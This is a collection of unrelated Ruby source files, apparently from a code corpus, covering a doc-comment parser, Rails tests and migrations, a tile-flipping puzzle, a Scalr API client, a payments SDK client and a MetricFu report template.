if type_name == ""
type_proxy = nil
else
type_proxy = type_resolver.resolve(type_name, lineno)
end
return LinkTag.new(lineno, type_proxy, member_name, text)
end
return nil
end
# handle {@link ...} in comments
class LinkInlineParser < InlineParser
def end
link = create_link(@type_resolver, @text, @lineno)
if link.nil?
"{@link #{@text}}"
else
link
end
end
end
# handle {@code ...} in comments
class CodeInlineParser < InlineParser
def end; CodeTag.new(@lineno, @text); end
end
class BlockParser
def initialize
@inline_parsers = {}
@data = nil
end
attr_accessor :handler
def begin_block(type_resolver, lineno)
@type_resolver = type_resolver
@lineno = lineno
end
def end_block
@data
end
def add_inline_parser(tag_name, parser)
@inline_parsers[tag_name] = parser
end
def handler_for(tag)
inline_parser = @inline_parsers[tag.body]
if inline_parser.nil?
$stderr.puts("#{tag.lineno}: Unknown inline tag #{tag.body.inspect} for #{self.class.name}")
NIL_INLINE_PARSER
else
inline_parser
end
end
def text(text)
add_text(text.to_s)
end
def add_inline(tag)
@data.add_inline(tag)
end
def add_text(text)
raise "#{self.class.name} has no @data" unless @data
@data.add_inline(text)
end
end
class NilBlockParser < BlockParser
def add_text(text); end
def handler_for(tag); NIL_INLINE_PARSER; end
end
NIL_HANDLER = NilBlockParser.new
class NilInlineParser < InlineParser
def end; nil; end
end
NIL_INLINE_PARSER = NilInlineParser.new
class ParamParser < BlockParser
def begin_block(type_resolver, lineno)
super(type_resolver, lineno)
@data = ParamBlockTag.new
end
def end_block
first_inline = @data.inlines[0]
if first_inline =~ /\s*([^\s]+)\s+/
@data.inlines[0] = $'
@data.param_name = $1
end
@data
end
end
class ThrowsParser < BlockParser
def begin_block(type_resolver, lineno)
super(type_resolver, lineno)
@data = ThrowsBlockTag.new
end
def end_block
first_inline = @data.inlines[0]
if first_inline =~ /\A\s*([^\s]+)\s+/
@data.inlines[0] = $'
@data.exception_type = @type_resolver.resolve($1)
@data
else
nil
end
end
end
class ReturnParser < BlockParser
def begin_block(type_resolver, lineno)
super(type_resolver, lineno)
@data = ReturnBlockTag.new
end
end
class DescriptionParser < BlockParser
def begin_block(type_resolver, lineno)
super(type_resolver, lineno)
@data = BlockTag.new
end
end
class SeeParser < BlockParser
def begin_block(type_resolver, lineno)
super(type_resolver, lineno)
@data = SeeBlockTag.new
end
def end_block
@data.inlines.first =~ /\A\s*/
case $'
when /['"]/
# plain, 'string'-like see entry
when /</
# HTML entry
else
# 'link' entry
link = create_link(@type_resolver, @data.inlines.first, @lineno)
unless link.nil?
@data.inlines[0] = link
end
end
@data
end
end
#############################################################################
class ConfigBuilder
def build_method_config
config = build_config
add_standard_block_parsers(config)
config.add_block_parser("param", build_param_block_parser)
config.add_block_parser("return", build_return_block_parser)
config.add_block_parser("throws", build_throws_block_parser)
config.add_block_parser("exception", build_throws_block_parser)
return config
end
def build_field_config
config = build_config
add_standard_block_parsers(config)
return config
end
def build_type_config
config = build_config
add_standard_block_parsers(config)
config.add_block_parser("author", build_author_block_parser)
return config
end
protected
def build_config
DocCommentParserConfig.new
end
def add_standard_block_parsers(config)
config.initial_block_handler = build_description_block_parser
config.add_block_parser("see", build_see_block_parser)
end
def add_common_inlines(block_parser)
block_parser.add_inline_parser("link", LinkInlineParser.new)
block_parser.add_inline_parser("code", CodeInlineParser.new)
end
def build_description_block_parser
parser = DescriptionParser.new
add_common_inlines(parser)
parser
end
def build_param_block_parser
parser = ParamParser.new
add_common_inlines(parser)
parser
end
def build_return_block_parser
parser = ReturnParser.new
add_common_inlines(parser)
parser
end
def build_throws_block_parser
parser = ThrowsParser.new
add_common_inlines(parser)
parser
end
def build_see_block_parser
parser = SeeParser.new
add_common_inlines(parser)
parser
end
def build_author_block_parser
NilBlockParser.new # ignore @author tags
end
end
# vim:softtabstop=2:shiftwidth=2
| 19.046904 | 98 | 0.687352 |
d5d8628bfbf59918eaf1f3976fbcb6ae064793e2 | 1,030 | require 'test_helper'
class TagsControllerTest < ActionController::TestCase
setup do
@tag = tags(:one)
end
test "should get index" do
get :index
assert_response :success
assert_not_nil assigns(:tags)
end
test "should get new" do
get :new
assert_response :success
end
test "should create tag" do
assert_difference('Tag.count') do
post :create, tag: { convention_id: @tag.convention_id, name: @tag.name }
end
assert_redirected_to tag_path(assigns(:tag))
end
test "should show tag" do
get :show, id: @tag
assert_response :success
end
test "should get edit" do
get :edit, id: @tag
assert_response :success
end
test "should update tag" do
patch :update, id: @tag, tag: { convention_id: @tag.convention_id, name: @tag.name }
assert_redirected_to tag_path(assigns(:tag))
end
test "should destroy tag" do
assert_difference('Tag.count', -1) do
delete :destroy, id: @tag
end
assert_redirected_to tags_path
end
end
| 20.6 | 88 | 0.675728 |
acf16155f42943e5c7c747117c40415b34571bfd | 681 | # Be sure to restart your server when you modify this file.
# Version of your assets, change this if you want to expire all your assets.
Rails.application.config.assets.version = "1.0"
# Add additional assets to the asset load path
# Rails.application.config.assets.paths << Emoji.images_path
# Precompile additional assets.
# application.js, application.css, and all non-JS/CSS in app/assets folder are already added.
Rails.application.config.assets.precompile += [
"admin/login.css",
]
# Move default assets directory so this project can co-exist with the
# static-site projectt that delivers most of the web content.
Rails.application.config.assets.prefix = "/web-assets"
| 37.833333 | 93 | 0.772394 |
0317f9162ccf3efa8d81cce8cb260f687a9c7dd7 | 5,336 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Group empty states' do
let(:group) { create(:group) }
let(:user) { create(:group_member, :developer, user: create(:user), group: group ).user }
before do
sign_in(user)
end
[:issue, :merge_request].each do |issuable|
issuable_name = issuable.to_s.humanize.downcase
project_relation = issuable == :issue ? :project : :source_project
context "for #{issuable_name}s" do
let(:path) { public_send(:"#{issuable}s_group_path", group) }
context 'group has a project' do
let(:project) { create(:project, namespace: group) }
before do
project.add_maintainer(user)
end
context "the project has #{issuable_name}s" do
it 'does not display an empty state' do
create(issuable, project_relation => project)
visit path
expect(page).not_to have_selector('.empty-state')
end
it "displays link to create new #{issuable} when no open #{issuable} is found", :js do
create("closed_#{issuable}", project_relation => project)
issuable_link_fn = "project_#{issuable}s_path"
visit public_send(issuable_link_fn, project)
wait_for_all_requests
page.within(find('.empty-state')) do
expect(page).to have_content(/There are no open #{issuable.to_s.humanize.downcase}/)
new_issuable_path = issuable == :issue ? 'new_project_issue_path' : 'project_new_merge_request_path'
path = public_send(new_issuable_path, project)
expect(page.find('a')['href']).to have_content(path)
end
end
it 'displays link to create new issue when the current search gave no results', :js do
create(issuable, project_relation => project)
issuable_link_fn = "project_#{issuable}s_path"
visit public_send(issuable_link_fn, project, author_username: 'foo', scope: 'all', state: 'opened')
wait_for_all_requests
page.within(find('.empty-state')) do
expect(page).to have_content(/Sorry, your filter produced no results/)
new_issuable_path = issuable == :issue ? 'new_project_issue_path' : 'project_new_merge_request_path'
path = public_send(new_issuable_path, project)
expect(page.find('a')['href']).to have_content(path)
end
end
it "displays conditional text when no closed #{issuable} is found", :js do
create(issuable, project_relation => project)
issuable_link_fn = "project_#{issuable}s_path"
visit public_send(issuable_link_fn, project, state: 'closed')
wait_for_all_requests
page.within(find('.empty-state')) do
expect(page).to have_content(/There are no closed #{issuable.to_s.humanize.downcase}/)
end
end
end
context "the project has no #{issuable_name}s", :js do
before do
visit path
end
it 'displays an empty state' do
expect(page).to have_selector('.empty-state')
end
it "shows a new #{issuable_name} button" do
within '.empty-state' do
expect(page).to have_content("create #{issuable_name}")
end
end
it "the new #{issuable_name} button opens a project dropdown" do
within '.empty-state' do
click_button 'Toggle project select'
end
expect(page).to have_selector('.ajax-project-dropdown')
end
end
end
shared_examples "no projects" do
it 'displays an empty state' do
expect(page).to have_selector('.empty-state')
end
it "does not show a new #{issuable_name} button" do
within '.empty-state' do
expect(page).not_to have_link("create #{issuable_name}")
end
end
end
context 'group without a project' do
context 'group has a subgroup' do
let(:subgroup) { create(:group, parent: group) }
let(:subgroup_project) { create(:project, namespace: subgroup) }
context "the project has #{issuable_name}s" do
before do
create(issuable, project_relation => subgroup_project)
visit path
end
it 'does not display an empty state' do
expect(page).not_to have_selector('.empty-state')
end
end
context "the project has no #{issuable_name}s" do
before do
visit path
end
it 'displays an empty state' do
expect(page).to have_selector('.empty-state')
end
end
end
context 'group has no subgroups' do
before do
visit path
end
it_behaves_like "no projects"
end
end
context 'group has only a project with issues disabled' do
let(:project_with_issues_disabled) { create(:empty_project, :issues_disabled, group: group) }
before do
visit path
end
it_behaves_like "no projects"
end
end
end
end
| 30.843931 | 114 | 0.589018 |
e28483466d299a9940ce7ef0c9ef1b8e69faab20 | 1,325 | describe :enumeratorized_with_unknown_size, shared: true do
describe "when no block is given" do
describe "returned Enumerator" do
# NATFIXME
xit "size returns nil" do
@object.send(*@method).size.should == nil
end
end
end
end
describe :enumeratorized_with_origin_size, shared: true do
describe "when no block is given" do
describe "returned Enumerator" do
# NATFIXME
xit "size returns the enumerable size" do
@object.send(*@method).size.should == @object.size
end
end
end
end
describe :enumeratorized_with_cycle_size, shared: true do
describe "when no block is given" do
describe "returned Enumerator" do
describe "size" do
it "should be the result of multiplying the enumerable size by the argument passed" do
@object.cycle(2).size.should == @object.size * 2
@object.cycle(7).size.should == @object.size * 7
@object.cycle(0).size.should == 0
@empty_object.cycle(2).size.should == 0
end
it "should be zero when the argument passed is 0 or less" do
@object.cycle(-1).size.should == 0
end
it "should be Float::INFINITY when no argument is passed" do
@object.cycle.size.should == Float::INFINITY
end
end
end
end
end
| 29.444444 | 94 | 0.642264 |
ff0b74fdd1ad115674a48e94d9957cfe9d9aad7a | 435 | class CreateUsers < ActiveRecord::Migration[5.2]
def change
create_table :users do |t|
t.string :name
t.string :email
t.string :username
t.string :password_digest
t.string :avatar_image
t.string :status
t.string :address
t.string :city
t.string :state
t.string :zipcode
t.date :birthday
t.string :favorite_beauty_brands
t.timestamps
end
end
end
| 21.75 | 48 | 0.627586 |
01aeab6b33ecb52b17cc74b81a09acb5b42fd8b4 | 981 | # -*- encoding: utf-8 -*-
require File.expand_path('../lib/flipper/version', __FILE__)
require File.expand_path('../lib/flipper/metadata', __FILE__)
flipper_mongo_files = lambda do |file|
file =~ /mongo/
end
Gem::Specification.new do |gem|
gem.authors = ['John Nunemaker']
gem.email = ['[email protected]']
gem.summary = 'Mongo adapter for Flipper'
gem.description = 'Mongo adapter for Flipper'
gem.license = 'MIT'
gem.homepage = 'https://github.com/jnunemaker/flipper'
gem.files = `git ls-files`.split("\n").select(&flipper_mongo_files) + ['lib/flipper/version.rb']
gem.test_files = `git ls-files -- {test,spec,features}/*`.split("\n").select(&flipper_mongo_files)
gem.name = 'flipper-mongo'
gem.require_paths = ['lib']
gem.version = Flipper::VERSION
gem.metadata = Flipper::METADATA
gem.add_dependency 'flipper', "~> #{Flipper::VERSION}"
gem.add_dependency 'mongo', '~> 2.0'
end
| 36.333333 | 106 | 0.648318 |
f8add43b9e8b3063d381188345245085d04c22d7 | 2,259 | # frozen_string_literal: true
class Floor
attr_accessor :tiles
# Grid system:
# x: w-e
# y: sw - ne
MOVES = {
'e' => { x: 1, y: 0 },
'se' => { x: 1, y: -1 },
'sw' => { x: 0, y: -1 },
'w' => { x: -1, y: 0 },
'nw' => { x: -1, y: 1 },
'ne' => { x: 0, y: 1 }
}.freeze
def initialize
@tiles = {}
end
def process(line)
directions = directions(line)
position = tile_position(directions)
tile = tiles[position]
tile ||= { state: :white, position: position }
@tiles[position] = flip_tile(tile)
end
def directions(line)
directions = []
loop do
break if line.nil?
token_match = line.match(/^(e|se|sw|w|nw|ne)/)
break if token_match.nil?
directions << token_match[1]
line.sub!(token_match[1], '')
end
directions
end
def tile_position(directions, reference = nil)
position = reference&.clone || { x: 0, y: 0 }
directions.each do |move|
position[:x] += MOVES[move][:x]
position[:y] += MOVES[move][:y]
end
position
end
def flip_tile(tile)
tile[:state] = tile[:state] == :white ? :black : :white
tile
end
def black_tiles(group = nil)
group ||= @tiles.values
group.select { |tile| tile[:state] == :black }
end
def white_tiles(group = nil)
group ||= @tiles.values
group.select { |tile| tile[:state] == :white }
end
def daily_flip
new_tiles = {}
expand_scope
@tiles.each_value do |tile|
black_tiles_count = black_tiles(neighbor_tiles(tile)).length
state = if tile[:state] == :black
black_tiles_count == 0 || black_tiles_count > 2 ? :white : :black
else
black_tiles_count == 2 ? :black : :white
end
new_tiles[tile[:position]] = { state: state, position: tile[:position] }
end
@tiles = new_tiles
end
def expand_scope
black_tiles.each do |black_tile|
neighbor_tiles(black_tile).each do |tile|
@tiles[tile[:position]] ||= tile
end
end
end
def neighbor_tiles(tile)
MOVES.keys.map do |direction|
position = tile_position([direction], tile[:position])
@tiles[position] || { state: :white, position: position }
end
end
end
| 21.932039 | 81 | 0.570606 |
b9a397adb6f1c0333fd145477e8729968166330c | 700 | # frozen_string_literal: true
# Manages records which expire using the `expires_at` column.
module WithExpiration
extend ActiveSupport::Concern
included do
scope :expired, -> { where.not('expires_at < ?', Time.now) }
validates :expires_at, presence: true
end
# Set the expiration to occur by a duration
#
# @param duration [Integer] how far in the future to set the expiry
# @return [void]
def expires_in=(duration)
self.expires_at = duration.from_now
end
# @return [Integer] the time remaining before this expires
def expires_in
Time.now - expires_at
end
# @return [Boolean] whether this has expired yet
def expired?
expires_at&.past?
end
end
| 22.580645 | 69 | 0.708571 |
21de187e315bb2695a14081cfffe68f6796fbd18 | 1,160 | module Ubiquitously
module MvcForge
class Account < Ubiquitously::Service::Account
# raises Net::HTTPForbidden 403 if already logged in
def login
page = agent.get("http://mvcforge.com/user/login")
form = page.forms.detect { |form| form.form_node["id"] == "user-login" }
form["name"] = username
form["pass"] = password
page = form.submit
authorize!(page.parser.css(".messages.error").text.to_s !~ /unrecognized username or password/i)
end
end
class Post < Ubiquitously::Service::Post
def create
page = agent.get("http://mvcforge.com/submit")
form = page.form_with(:action => "/submit")
form["url"] = token[:url]
form["title"] = token[:title]
form["body"] = token[:description]
form["taxonomy[tags][3]"]
form.field_with(:name => "taxonomy[1]").options.each do |option|
option.select if option.value.to_s == "90"
end
form["op"] = "Submit"
page = form.submit(form.button_with(:value => "Submit"))
true
end
end
end
end
| 30.526316 | 104 | 0.564655 |
1cb18c4efac593a3640cd966af4289c9663c42d5 | 311 | class ConfirmationsController < ApplicationController
def show
user = User.confirm_by_token(params[:confirmation_token])
if user.errors.empty?
redirect_to root_path, notice: t('confirmations.confirmed')
else
redirect_to root_path, danger: t('confirmations.failure')
end
end
end
| 25.916667 | 65 | 0.73955 |
39db1652877a680432b68b8df28027142adbfced | 5,627 | require 'uri'
require 'hmac'
require 'hmac-sha2'
require 'base64'
require 'net/https'
require 'net/http'
module Scalr
class Request
class ScalrError < RuntimeError; end
class InvalidInputError < ScalrError; end
ACTIONS = {
:bundle_task_get_status => {:name => 'BundleTaskGetStatus', :inputs => {:bundle_task_id => true}},
:dns_zone_create => {:name => 'DNSZoneCreate', :inputs => {:domain_name => true, :farm_id => false, :farm_role_id => false}},
:dns_zone_record_add => {:name => 'DNSZoneRecordAdd', :inputs => {:zone_name => true, :type => true, :ttl => true, :name => true, :value => true, :priority => false, :weight => false, :port => false}},
:dns_zone_record_remove => {:name => 'DNSZoneRecordRemove', :inputs => {:zone_name => true, :record_id => true}},
:dns_zone_records_list => {:name => 'DNSZoneRecordsList', :inputs => {:zone_name => true}},
:dns_zones_list => {:name => 'DNSZonesList', :inputs => {}},
:events_list => {:name => 'EventsList', :inputs => {:farm_id => true, :start_from => false, :records_limit => false}},
:farm_get_details => {:name => 'FarmGetDetails', :inputs => {:farm_id => true}},
:farm_get_stats => {:name => 'FarmGetStats', :inputs => {:farm_id => true, :date => false}},
:farms_list => {:name => 'FarmsList', :inputs => {}},
:farm_terminate => {:name => 'FarmTerminate', :inputs => {:farm_id => true, :keep_ebs => true, :keep_eip => false, :keep_dns_zone => false}},
:farm_launch => {:name => 'FarmLaunch', :inputs => {:farm_id => true}},
:logs_list => {:name => 'LogsList', :inputs => {:farm_id => true, :server_id => true, :start_from => false, :records_limit => false}},
:roles_list => {:name => 'RolesList', :inputs => {:platform => false, :name => false, :prefix => false, :image_id => false}},
:script_execute => {:name => 'ScriptExecute', :inputs => {:farm_role_id => false, :server_id => false, :farm_id => true, :script_id => true, :timeout => true, :async => true, :revision => false, :config_variables => false}},
:script_get_details => {:name => 'ScriptGetDetails', :inputs => {:script_id => true}},
:scripts_list => {:name => 'ScriptsList', :inputs => {}},
:server_image_create => {:name => 'ServerImageCreate', :inputs => {:server_id => true, :role_name => true}},
:server_launch => {:name => 'ServerLaunch', :inputs => {:farm_role_id => true}},
:server_reboot => {:name => 'ServerReboot', :inputs => {:server_id => true}},
:server_terminate => {:name => 'ServerTerminate', :inputs => {:server_id => true, :decrease_min_instances_setting => false}},
:statistics_get_graph_url => {:name => 'StatisticsGetGraphURL', :inputs => {:object_type => true, :object_id => true, :watcher_name => true, :graph_type => true}}
}
INPUTS = {
:async => 'Async',
:bundle_task_id => 'BundleTaskID',
:config_variables => 'ConfigVariables',
:date => 'Date',
:decrease_min_instances_setting => 'DecreaseMinInstancesSetting',
:domain_name => 'DomainName',
:farm_id => 'FarmID',
:farm_role_id => 'FarmRoleID',
:graph_type => 'GraphType',
:image_id => 'ImageID',
:keep_dns_zone => 'KeepDNSZone',
:keep_ebs => 'KeepEBS',
:keep_eip => 'KeepEIP',
:key => 'Key',
:name => 'Name',
:object_id => 'ObjectID',
:object_type => 'ObjectType',
:platform => 'Platform',
:port => 'Port',
:prefix => 'Prefix',
:priority => 'Priority',
:record_id => 'RecordID',
:records_limit => 'RecordsLimit',
:revision => 'Revision',
:role_name => 'RoleName',
:script_id => 'ScriptID',
:server_id => 'ServerID',
:start_from => 'StartFrom',
:timeout => 'Timeout',
:ttl => 'TTL',
:type => 'Type',
:value => 'Value',
:watcher_name => 'WatcherName',
:weight => 'Weight',
:zone_name => 'ZoneName'
}
attr_accessor :inputs, :endpoint, :access_key, :signature
def initialize(action, endpoint, key_id, access_key, version, *arguments)
set_inputs(action, arguments.flatten.first)
@inputs.merge!('Action' => ACTIONS[action.to_sym][:name], 'KeyID' => key_id, 'Version' => version, 'Timestamp' => Time.now.utc.iso8601)
@endpoint = endpoint
@access_key = access_key
end
def process!
set_signature!
http = Net::HTTP.new(@endpoint, 443)
http.use_ssl = true
response, data = http.get("/?" + query_string + "&Signature=#{URI.escape(@signature)}", nil)
return Scalr::Response.new(response, data)
end
private
def set_inputs(action, input_hash)
input_hash ||= {}
raise InvalidInputError.new unless input_hash.is_a? Hash
ACTIONS[action][:inputs].each do |key, value|
raise InvalidInputError.new("Missing required input: #{key.to_s}") if value and input_hash[key].nil?
end
@inputs = {}
input_hash.each do |key, value|
raise InvalidInputError.new("Unknown input: #{key.to_s}") if ACTIONS[action][:inputs][key].nil?
@inputs[INPUTS[key]] = value.to_s
end
end
def query_string
@inputs.sort.collect { |key, value| [URI.escape(key.to_s), URI.escape(value.to_s)].join('=') }.join('&')
end
def set_signature!
string_to_sign = query_string.gsub('=','').gsub('&','')
hmac = HMAC::SHA256.new(@access_key)
hmac.update(string_to_sign)
@signature = Base64.encode64(hmac.digest).chomp
end
end
end | 46.891667 | 230 | 0.594278 |
d53dc6ce0afd595ee0128cbefc25093d261760f8 | 762 | require 'rails_helper'
RSpec.describe Category, type: :model do
context 'Validations for Category' do
let(:category) { FactoryBot.create :category }
it 'should be valid' do
expect(category).to be_valid
end
it 'should be present' do
expect(category).to be_present
end
it 'should not be spaces for name' do
category.name = ' '
expect(category).to_not be_valid
end
it 'should not be valid if priority is not an integer' do
category.priority = nil
expect(category).to_not be_valid
end
end
context 'Associations with category table' do
it 'has many articles' do
assc = Category.reflect_on_association(:articles)
expect(assc.macro).to eq :has_many
end
end
end
| 23.090909 | 61 | 0.671916 |
e8883b1c333c6da9539701089b4c6f1a1a7149d0 | 2,346 | # this generator based on rails_admin's install generator.
# https://www.github.com/sferik/rails_admin/master/lib/generators/rails_admin/install_generator.rb
require 'rails/generators'
# http://guides.rubyonrails.org/generators.html
# http://rdoc.info/github/wycats/thor/master/Thor/Actions.html
module Koudoku
class InstallGenerator < Rails::Generators::Base
def self.source_paths
[Koudoku::Engine.root, File.expand_path("../templates", __FILE__)]
end
include Rails::Generators::Migration
argument :subscription_owner_model, :type => :string, :required => true, :desc => "Owner of the subscription"
desc "Koudoku installation generator"
# Override the attr_accessor generated by 'argument' so that
# subscription_owner_model is always returned lowercase.
def subscription_owner_model
@subscription_owner_model.downcase
end
def install
unless defined?(Koudoku)
gem("koudoku")
end
require "securerandom"
template "config/initializers/koudoku.rb"
# Add coupons.
generate("model coupon code:string free_trial_length:string")
template "app/models/coupon.rb"
# Add the plans.
generate("model", "plan name:string stripe_id:string price:float interval:string features:text highlight:boolean display_order:integer")
template "app/models/plan.rb"
# Generate subscription.
generate("model", "subscription stripe_id:string plan:references last_four:string coupon:references card_type:string current_price:float #{subscription_owner_model}:references")
template "app/models/subscription.rb"
# Update the owner relationship.
inject_into_class "app/models/#{subscription_owner_model}.rb", subscription_owner_model.camelize.constantize,
"# Added by Koudoku.\n has_one :subscription\n\n"
# Install the pricing table.
copy_file "app/views/koudoku/subscriptions/_social_proof.html.erb"
# Add webhooks to the route.
route <<-RUBY
# Added by Koudoku.
mount Koudoku::Engine, at: 'koudoku'
scope module: 'koudoku' do
get 'pricing' => 'subscriptions#index', as: 'pricing'
end
RUBY
# Show the user the API key we generated.
say "\nTo enable support for Stripe webhooks, point it to \"/koudoku/events\"."
end
end
end
| 31.28 | 183 | 0.712276 |
282443e4a25a9cfe979d3d0ffa45eba33b61679a | 103 | module GrowlGlue
module Util
def with(obj)
yield obj
obj
end
end
end
| 9.363636 | 17 | 0.533981 |
1d558e3fc487ec22973c713e6bd4509af07bba25 | 480 | require 'formula'
class Webfs < Formula
homepage 'http://linux.bytesex.org/misc/webfs.html'
url 'http://dl.bytesex.org/releases/webfs/webfs-1.21.tar.gz'
sha1 'a38880d8cb21e415244d220115ede7b573ac890c'
patch :p0 do
url "https://trac.macports.org/export/21504/trunk/dports/www/webfs/files/patch-ls.c"
sha1 "0c408afff6df5b85f3c61afd4f44eb1944ba3a17"
end
def install
ENV["prefix"]=prefix
system "make install mimefile=/etc/apache2/mime.types"
end
end
| 26.666667 | 88 | 0.74375 |
6125a818c38e6b19cff57ac43aa18e63a2864f26 | 9,509 | #
# This class was auto-generated.
#
require 'onlinepayments/sdk/api_resource'
require 'onlinepayments/sdk/response_exception'
require 'onlinepayments/sdk/domain/error_response'
require 'onlinepayments/sdk/domain/get_payment_products_response'
require 'onlinepayments/sdk/domain/payment_product'
require 'onlinepayments/sdk/domain/payment_product_networks_response'
require 'onlinepayments/sdk/domain/product_directory'
require 'onlinepayments/sdk/merchant/products/get_payment_product_networks_params'
require 'onlinepayments/sdk/merchant/products/get_payment_product_params'
require 'onlinepayments/sdk/merchant/products/get_payment_products_params'
require 'onlinepayments/sdk/merchant/products/get_product_directory_params'
module OnlinePayments::SDK
module Merchant
module Products
# Products client. Thread-safe.
class ProductsClient < OnlinePayments::SDK::ApiResource
# @param parent [OnlinePayments::SDK::ApiResource]
# @param path_context [Hash, nil]
def initialize(parent, path_context = nil)
super(parent, path_context)
end
# Resource /v2/!{merchantId}/products
# @param query [OnlinePayments::SDK::Merchant::Products::GetPaymentProductsParams]
# @param context [OnlinePayments::SDK::CallContext]
# @return [OnlinePayments::SDK::Domain::GetPaymentProductsResponse]
# @raise [OnlinePayments::SDK::ValidationException] if the request was not correct and couldn't be processed (HTTP status code 400)
# @raise [OnlinePayments::SDK::AuthorizationException] if the request was not allowed (HTTP status code 403)
# @raise [OnlinePayments::SDK::IdempotenceException] if an idempotent request caused a conflict (HTTP status code 409)
# @raise [OnlinePayments::SDK::ReferenceException] if an object was attempted to be referenced that doesn't exist or has been removed,
# or there was a conflict (HTTP status code 404, 409 or 410)
# @raise [OnlinePayments::SDK::PaymentPlatformException] if something went wrong at the payment platform,
# the payment platform was unable to process a message from a downstream partner/acquirer,
# or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
# @raise [OnlinePayments::SDK::ApiException]if the payment platform returned any other error
def get_payment_products(query, context = nil)
uri = instantiate_uri('/v2/{merchantId}/products')
@communicator.get(
uri,
client_headers,
query,
OnlinePayments::SDK::Domain::GetPaymentProductsResponse,
context
)
rescue ResponseException => e
error_type = OnlinePayments::SDK::Domain::ErrorResponse
error_object = @communicator.marshaller.unmarshal(e.body, error_type)
raise create_exception(e.status_code, e.body, error_object, context)
end
# Resource /v2/!{merchantId}/products/!{paymentProductId}
# @param payment_product_id [Integer]
# @param query [OnlinePayments::SDK::Merchant::Products::GetPaymentProductParams]
# @param context [OnlinePayments::SDK::CallContext]
# @return [OnlinePayments::SDK::Domain::PaymentProduct]
# @raise [OnlinePayments::SDK::ValidationException] if the request was not correct and couldn't be processed (HTTP status code 400)
# @raise [OnlinePayments::SDK::AuthorizationException] if the request was not allowed (HTTP status code 403)
# @raise [OnlinePayments::SDK::IdempotenceException] if an idempotent request caused a conflict (HTTP status code 409)
# @raise [OnlinePayments::SDK::ReferenceException] if an object was attempted to be referenced that doesn't exist or has been removed,
# or there was a conflict (HTTP status code 404, 409 or 410)
# @raise [OnlinePayments::SDK::PaymentPlatformException] if something went wrong at the payment platform,
# the payment platform was unable to process a message from a downstream partner/acquirer,
# or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
# @raise [OnlinePayments::SDK::ApiException]if the payment platform returned any other error
def get_payment_product(payment_product_id, query, context = nil)
path_context = {
'paymentProductId'.freeze => payment_product_id.to_s,
}
uri = instantiate_uri('/v2/{merchantId}/products/{paymentProductId}', path_context)
@communicator.get(
uri,
client_headers,
query,
OnlinePayments::SDK::Domain::PaymentProduct,
context
)
rescue ResponseException => e
error_type = OnlinePayments::SDK::Domain::ErrorResponse
error_object = @communicator.marshaller.unmarshal(e.body, error_type)
raise create_exception(e.status_code, e.body, error_object, context)
end
# Resource /v2/!{merchantId}/products/!{paymentProductId}/directory
# @param payment_product_id [Integer]
# @param query [OnlinePayments::SDK::Merchant::Products::GetProductDirectoryParams]
# @param context [OnlinePayments::SDK::CallContext]
# @return [OnlinePayments::SDK::Domain::ProductDirectory]
# @raise [OnlinePayments::SDK::ValidationException] if the request was not correct and couldn't be processed (HTTP status code 400)
# @raise [OnlinePayments::SDK::AuthorizationException] if the request was not allowed (HTTP status code 403)
# @raise [OnlinePayments::SDK::IdempotenceException] if an idempotent request caused a conflict (HTTP status code 409)
# @raise [OnlinePayments::SDK::ReferenceException] if an object was attempted to be referenced that doesn't exist or has been removed,
# or there was a conflict (HTTP status code 404, 409 or 410)
# @raise [OnlinePayments::SDK::PaymentPlatformException] if something went wrong at the payment platform,
# the payment platform was unable to process a message from a downstream partner/acquirer,
# or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
# @raise [OnlinePayments::SDK::ApiException]if the payment platform returned any other error
def get_product_directory(payment_product_id, query, context = nil)
path_context = {
'paymentProductId'.freeze => payment_product_id.to_s,
}
uri = instantiate_uri('/v2/{merchantId}/products/{paymentProductId}/directory', path_context)
@communicator.get(
uri,
client_headers,
query,
OnlinePayments::SDK::Domain::ProductDirectory,
context
)
rescue ResponseException => e
error_type = OnlinePayments::SDK::Domain::ErrorResponse
error_object = @communicator.marshaller.unmarshal(e.body, error_type)
raise create_exception(e.status_code, e.body, error_object, context)
end
# Resource /v2/!{merchantId}/products/!{paymentProductId}/networks
# @param payment_product_id [Integer]
# @param query [OnlinePayments::SDK::Merchant::Products::GetPaymentProductNetworksParams]
# @param context [OnlinePayments::SDK::CallContext]
# @return [OnlinePayments::SDK::Domain::PaymentProductNetworksResponse]
# @raise [OnlinePayments::SDK::ValidationException] if the request was not correct and couldn't be processed (HTTP status code 400)
# @raise [OnlinePayments::SDK::AuthorizationException] if the request was not allowed (HTTP status code 403)
# @raise [OnlinePayments::SDK::IdempotenceException] if an idempotent request caused a conflict (HTTP status code 409)
# @raise [OnlinePayments::SDK::ReferenceException] if an object was attempted to be referenced that doesn't exist or has been removed,
# or there was a conflict (HTTP status code 404, 409 or 410)
# @raise [OnlinePayments::SDK::PaymentPlatformException] if something went wrong at the payment platform,
# the payment platform was unable to process a message from a downstream partner/acquirer,
# or the service that you're trying to reach is temporary unavailable (HTTP status code 500, 502 or 503)
# @raise [OnlinePayments::SDK::ApiException]if the payment platform returned any other error
def get_payment_product_networks(payment_product_id, query, context = nil)
path_context = {
'paymentProductId'.freeze => payment_product_id.to_s,
}
uri = instantiate_uri('/v2/{merchantId}/products/{paymentProductId}/networks', path_context)
@communicator.get(
uri,
client_headers,
query,
OnlinePayments::SDK::Domain::PaymentProductNetworksResponse,
context
)
rescue ResponseException => e
error_type = OnlinePayments::SDK::Domain::ErrorResponse
error_object = @communicator.marshaller.unmarshal(e.body, error_type)
raise create_exception(e.status_code, e.body, error_object, context)
end
end
end
end
end
| 60.955128 | 142 | 0.688506 |
26748b84614a533ebf1b4842c2a049a088a6dbcd | 1,481 | MetricFu.lib_require { "formatter/syntax" }
MetricFu.lib_require { "templates/template" }
# Creates an HTML document for a given analyzed file,
# with scored metrics annotating the relevant line.
module MetricFu
module Templates
class Report < MetricFu::Template
# @param file [String] the analyzed file to annotate
# @param lines [Hash] of line number [String] keyed to an list [[Array] of metrics for that line. Each metric in the list is a hash containing the keys :type => metric_name, :descrption => metric_score
# @example file and lines
# file: "lib/metric_fu/gem_version.rb
# lines: {"30"=>[{:type=>:flog, :description=>"Score of 22.43"}], "42"=>[{:type=>:flog, :description=>"Score of 8.64"}]}
def initialize(file, lines)
@file = file
@lines = lines
@data = File.open(file, "rb") { |f| f.readlines }
end
def render
erbify("report")
end
def convert_ruby_to_html(ruby_text, line_number)
MetricFu::Formatter::Syntax.new.highlight(ruby_text, line_number)
end
